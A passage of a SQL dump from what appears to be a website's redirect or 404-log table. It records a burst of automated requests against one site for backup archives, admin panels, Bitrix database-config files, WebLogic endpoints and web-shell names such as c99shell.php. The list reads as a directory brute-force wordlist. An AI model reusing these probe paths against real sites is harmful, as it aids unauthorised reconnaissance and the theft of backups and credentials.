00:00:00',301),(5919,'http://ekvatorprint.com.ua/backup1/',NULL,'','',4,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5920,'http://ekvatorprint.com.ua/backup2/',NULL,'','',4,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5921,'http://ekvatorprint.com.ua/backups',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5922,'http://ekvatorprint.com.ua/backups.7z',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5923,'http://ekvatorprint.com.ua/backup123/',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5924,'http://ekvatorprint.com.ua/backups.inc',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5925,'http://ekvatorprint.com.ua/backups.inc.old',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5926,'http://ekvatorprint.com.ua/backups.sql',NULL,'','',2,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5927,'http://ekvatorprint.com.ua/backups.old',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5928,'http://ekvatorprint.com.ua/backups.rar',NULL,'','',2,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5929,'http://ekvatorprint.com.ua/backups.tar',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5930,'http://ekvatorprint.com.ua/backups.zip',NULL,'','',2,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5931,'http://ekvatorprint.com.ua/badmin',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5932,'http://ekvatorprint.com.ua/backups.tar.bz2',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5933,'http://ekvatorprint.com.ua/backups.tar.gz',NULL,'','',2,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5934,'http://ekvatorprint.com.ua/backups.sql.old',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5935,'http://ekvatorprint.com.ua/backups.tgz',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5936,'http://ekvatorprint.com.ua/banner',NULL,'','',4,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5937,'http://ekvatorprint.com.ua/bak',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5938,'http://ekvatorprint.com.ua/banner.php',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5939,'http://ekvatorprint.com.ua/banner/',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5940,'http://ekvatorprint.com.ua/banners.php',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5941,'http://ekvatorprint.com.ua/banner.',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5942,'http://ekvatorprint.com.ua/bandwidth/',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5943,'http://ekvatorprint.com.ua/banneradmin',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5944,'http://ekvatorprint.com.ua/banner2',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5945,'http://ekvatorprint.com.ua/banners.',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5946,'http://ekvatorprint.com.ua/banners/',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5947,'http://ekvatorprint.com.ua/banners',NULL,'','',1,0,'2017-01-20 13:27:48','0000-00-00 00:00:00',301),(5948,'http://ekvatorprint.com.ua/base',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5949,'http://ekvatorprint.com.ua/bb-admin/index.php',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5950,'http://ekvatorprint.com.ua/base/',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5951,'http://ekvatorprint.com.ua/bb-admin/admin.php',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5952,'http://ekvatorprint.com.ua/bb',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5953,'http://ekvatorprint.com.ua/bb-admin/index.html',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5954,'http://ekvatorprint.com.ua/bb-admin/admin.',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5955,'http://ekvatorprint.com.ua/basic',NULL,'','',1,0,'2017-01-20 13:27:49','0000-00-00 00:00:00',301),(5956,'http://ekvatorprint.com.ua/bb-admin',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5957,'http://ekvatorprint.com.ua/bb-admin/index.',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5958,'http://ekvatorprint.com.ua/bb-admin/admin.html',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5959,'http://ekvatorprint.com.ua/bb-admin/login.php',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5960,'http://ekvatorprint.com.ua/bb-admin/',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5961,'http://ekvatorprint.com.ua/bb-admin/login.',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5962,'http://ekvatorprint.com.ua/bbpre',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5963,'http://ekvatorprint.com.ua/bea_wls_internal/a2e2gp2r2/x.jsp',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5964,'http://ekvatorprint.com.ua/bbemail',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5965,'http://ekvatorprint.com.ua/bea_wls_internal/getior',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5966,'http://ekvatorprint.com.ua/bb-admin/login.html',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5967,'http://ekvatorprint.com.ua/bbadmin',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5968,'http://ekvatorprint.com.ua/bea_wls_internal/classes/',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5969,'http://ekvatorprint.com.ua/bea_wls_internal/iiop/ClientRecv',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5970,'http://ekvatorprint.com.ua/bea_wls_internal/HTTPClntSend',NULL,'','',1,0,'2017-01-20 13:27:50','0000-00-00 00:00:00',301),(5971,'http://ekvatorprint.com.ua/bea_wls_internal/WLDummyInitJVMIDs',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5972,'http://ekvatorprint.com.ua/bea_wls_internal/iiop/ClientSend',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5973,'http://ekvatorprint.com.ua/bea_wls_internal',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5974,'http://ekvatorprint.com.ua/bea_wls_internal/HTTPClntRecv',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5975,'http://ekvatorprint.com.ua/beanManaged',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5976,'http://ekvatorprint.com.ua/bel_admin',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5977,'http://ekvatorprint.com.ua/bea_wls_internal/WebServiceServlet',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5978,'http://ekvatorprint.com.ua/bea_wls_internal/psquare/x.jsp',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5979,'http://ekvatorprint.com.ua/bea_wls_internal/iiop/ClientClose',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5980,'http://ekvatorprint.com.ua/beheer/',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5981,'http://ekvatorprint.com.ua/bea_wls_internal/iiop/ClientLogin',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5982,'http://ekvatorprint.com.ua/beta',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5983,'http://ekvatorprint.com.ua/billing',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5984,'http://ekvatorprint.com.ua/bestellvorgang.',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5985,'http://ekvatorprint.com.ua/billing/killer.php',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5986,'http://ekvatorprint.com.ua/bestellvorgang.php',NULL,'','',1,0,'2017-01-20 13:27:51','0000-00-00 00:00:00',301),(5987,'http://ekvatorprint.com.ua/bgadmin',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5988,'http://ekvatorprint.com.ua/bin/reset-db-prod.sh',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5989,'http://ekvatorprint.com.ua/bins/',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5990,'http://ekvatorprint.com.ua/bitrix',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5991,'http://ekvatorprint.com.ua/bin/reset-db.sh',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5992,'http://ekvatorprint.com.ua/bitrix/admin/index.php',NULL,'','',28,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5993,'http://ekvatorprint.com.ua/bitrix/import/',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5994,'http://ekvatorprint.com.ua/bitrix/error.log',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5995,'http://ekvatorprint.com.ua/bin/config.sh',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5996,'http://ekvatorprint.com.ua/bitrix/backup/',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5997,'http://ekvatorprint.com.ua/bitrix/import/import',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5998,'http://ekvatorprint.com.ua/bitrix/authorization.config',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(5999,'http://ekvatorprint.com.ua/bitrix/import/files',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(6000,'http://ekvatorprint.com.ua/bitrix/dumper/',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(6001,'http://ekvatorprint.com.ua/bitrix/modules/main/classes/mysql/agent.php',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(6002,'http://ekvatorprint.com.ua/bitrix/import/m_import',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(6003,'http://ekvatorprint.com.ua/bitrix/modules/error.log',NULL,'','',1,0,'2017-01-20 13:27:52','0000-00-00 00:00:00',301),(6004,'http://ekvatorprint.com.ua/bitrix/logs/',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6005,'http://ekvatorprint.com.ua/bitrix/modules/main/admin/restore.php',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6006,'http://ekvatorprint.com.ua/bitrix/modules/error.log.old',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6007,'http://ekvatorprint.com.ua/biy/upload/',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6008,'http://ekvatorprint.com.ua/bitrix/modules/updater.log',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6009,'http://ekvatorprint.com.ua/bitrix/web.config',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6010,'http://ekvatorprint.com.ua/bitrix/modules/smtpd.log',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6011,'http://ekvatorprint.com.ua/bitrix/modules/updater_partner.log',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6012,'http://ekvatorprint.com.ua/bitrix/otp/',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6013,'http://ekvatorprint.com.ua/black/template.xml',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6014,'http://ekvatorprint.com.ua/biz_admin',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6015,'http://ekvatorprint.com.ua/bitrix/php_interface/dbconn.php2',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6016,'http://ekvatorprint.com.ua/biz_admin_bak',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6017,'http://ekvatorprint.com.ua/bizadmin',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6018,'http://ekvatorprint.com.ua/blacklist.dat',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6019,'http://ekvatorprint.com.ua/blog',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6020,'http://ekvatorprint.com.ua/blocks',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6021,'http://ekvatorprint.com.ua/blank',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6022,'http://ekvatorprint.com.ua/blog/error_log',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6023,'http://ekvatorprint.com.ua/blog/wp-content/backup-db/',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6024,'http://ekvatorprint.com.ua/blog/wp-content/backups/',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6025,'http://ekvatorprint.com.ua/blog/fckeditor',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6026,'http://ekvatorprint.com.ua/blog_admin',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6027,'http://ekvatorprint.com.ua/blogadmin',NULL,'','',1,0,'2017-01-20 13:27:53','0000-00-00 00:00:00',301),(6028,'http://ekvatorprint.com.ua/blogs',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6029,'http://ekvatorprint.com.ua/bluadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6030,'http://ekvatorprint.com.ua/bnt_admin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6031,'http://ekvatorprint.com.ua/bmadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6032,'http://ekvatorprint.com.ua/bo0om.ru',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6033,'http://ekvatorprint.com.ua/boardadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6034,'http://ekvatorprint.com.ua/board',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6035,'http://ekvatorprint.com.ua/boadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6036,'http://ekvatorprint.com.ua/book',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6037,'http://ekvatorprint.com.ua/books',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6038,'http://ekvatorprint.com.ua/borat',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6039,'http://ekvatorprint.com.ua/bpadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6040,'http://ekvatorprint.com.ua/brokeradmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6041,'http://ekvatorprint.com.ua/bot.txt',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6042,'http://ekvatorprint.com.ua/browse',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6043,'http://ekvatorprint.com.ua/brunch-config.coffee',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6044,'http://ekvatorprint.com.ua/bsadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6045,'http://ekvatorprint.com.ua/browser/',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6046,'http://ekvatorprint.com.ua/brunch-config.js',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6047,'http://ekvatorprint.com.ua/bugs',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6048,'http://ekvatorprint.com.ua/buck.sql',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6049,'http://ekvatorprint.com.ua/build.sh',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6050,'http://ekvatorprint.com.ua/build.local.xml',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6051,'http://ekvatorprint.com.ua/build/build.properties',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6052,'http://ekvatorprint.com.ua/build/buildinfo.properties',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6053,'http://ekvatorprint.com.ua/bullet',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6054,'http://ekvatorprint.com.ua/business',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6055,'http://ekvatorprint.com.ua/build_config_private.ini',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6056,'http://ekvatorprint.com.ua/busadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6057,'http://ekvatorprint.com.ua/businessadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6058,'http://ekvatorprint.com.ua/button',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6059,'http://ekvatorprint.com.ua/buttons',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6060,'http://ekvatorprint.com.ua/bw-admin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6061,'http://ekvatorprint.com.ua/buy',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6062,'http://ekvatorprint.com.ua/bvadmin',NULL,'','',1,0,'2017-01-20 13:27:54','0000-00-00 00:00:00',301),(6063,'http://ekvatorprint.com.ua/c',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6064,'http://ekvatorprint.com.ua/bx_1c_import.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6065,'http://ekvatorprint.com.ua/c-h.v2.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6066,'http://ekvatorprint.com.ua/c22.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6067,'http://ekvatorprint.com.ua/c100.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6068,'http://ekvatorprint.com.ua/c99.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6069,'http://ekvatorprint.com.ua/c99shell.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6070,'http://ekvatorprint.com.ua/cache/sql_error_latest.cgi',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6071,'http://ekvatorprint.com.ua/cache_html',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6072,'http://ekvatorprint.com.ua/cacheadmin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6073,'http://ekvatorprint.com.ua/cachemonitor',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6074,'http://ekvatorprint.com.ua/cachemonitor/statistics.jsp',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6075,'http://ekvatorprint.com.ua/cacti',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6076,'http://ekvatorprint.com.ua/cadmin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6077,'http://ekvatorprint.com.ua/cal',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6078,'http://ekvatorprint.com.ua/calendar',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6079,'http://ekvatorprint.com.ua/callback',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6080,'http://ekvatorprint.com.ua/camadmin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6081,'http://ekvatorprint.com.ua/cancel.html',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6082,'http://ekvatorprint.com.ua/careers',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6083,'http://ekvatorprint.com.ua/cartadmin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6084,'http://ekvatorprint.com.ua/catalog',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6085,'http://ekvatorprint.com.ua/catalog_admin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6086,'http://ekvatorprint.com.ua/catalog_admin.php',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6087,'http://ekvatorprint.com.ua/catalogadmin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6088,'http://ekvatorprint.com.ua/catalog_admin.',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6089,'http://ekvatorprint.com.ua/category',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6090,'http://ekvatorprint.com.ua/categories',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6091,'http://ekvatorprint.com.ua/catalogsearch',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6092,'http://ekvatorprint.com.ua/cc',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6093,'http://ekvatorprint.com.ua/cb-admin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6094,'http://ekvatorprint.com.ua/cc-errors.txt',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6095,'http://ekvatorprint.com.ua/ccadmin',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6096,'http://ekvatorprint.com.ua/cc-log.txt',NULL,'','',1,0,'2017-01-20 13:27:55','0000-00-00 00:00:00',301),(6097,'http://ekvatorprint.com.ua/ccbill.log',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6098,'http://ekvatorprint.com.ua/cc_admin',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6099,'http://ekvatorprint.com.ua/ccct-admin',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6100,'http://ekvatorprint.com.ua/cells',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6101,'http://ekvatorprint.com.ua/cdadmin',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6102,'http://ekvatorprint.com.ua/certcontrol/',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6103,'http://ekvatorprint.com.ua/certenroll/',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6104,'http://ekvatorprint.com.ua/cell.xml',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6105,'http://ekvatorprint.com.ua/certificate',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6106,'http://ekvatorprint.com.ua/cerberusweb',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6107,'http://ekvatorprint.com.ua/cfide/administrator/index.cfm',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6108,'http://ekvatorprint.com.ua/cgi-admin',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6109,'http://ekvatorprint.com.ua/cgi',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6110,'http://ekvatorprint.com.ua/cgi-bin',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6111,'http://ekvatorprint.com.ua/certsrv/',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6112,'http://ekvatorprint.com.ua/cgi-dos/',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6113,'http://ekvatorprint.com.ua/cgi-exe/',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6114,'http://ekvatorprint.com.ua/cgi-perl/',NULL,'','',1,0,'2017-01-20 13:27:56','0000-00-00 00:00:00',301),(6115,'http://ekvatorprint.com.ua/cgi-bin2/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6116,'http://ekvatorprint.com.ua/cgi-local/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6117,'http://ekvatorprint.com.ua/cgi-shl/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6118,'http://ekvatorprint.com.ua/cgi-sys',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6119,'http://ekvatorprint.com.ua/cgi-sys/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6120,'http://ekvatorprint.com.ua/cgi-win/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6121,'http://ekvatorprint.com.ua/cgi.pl/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6122,'http://ekvatorprint.com.ua/cgi/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6123,'http://ekvatorprint.com.ua/cgi/account/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6124,'http://ekvatorprint.com.ua/cgibin/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6125,'http://ekvatorprint.com.ua/cgis/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6126,'http://ekvatorprint.com.ua/changeall.php',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6127,'http://ekvatorprint.com.ua/change.log',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6128,'http://ekvatorprint.com.ua/changelog.html',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6129,'http://ekvatorprint.com.ua/changelog.md',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6130,'http://ekvatorprint.com.ua/changelog.txt',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6131,'http://ekvatorprint.com.ua/chat',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6132,'http://ekvatorprint.com.ua/changes.txt',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6133,'http://ekvatorprint.com.ua/chatadmin',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6134,'http://ekvatorprint.com.ua/check.php',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6135,'http://ekvatorprint.com.ua/checkapache.html',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6136,'http://ekvatorprint.com.ua/checked_accounts.txt',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6137,'http://ekvatorprint.com.ua/checkout',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6138,'http://ekvatorprint.com.ua/cidr.txtР°',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6139,'http://ekvatorprint.com.ua/chubb.xml',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6140,'http://ekvatorprint.com.ua/citrix/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 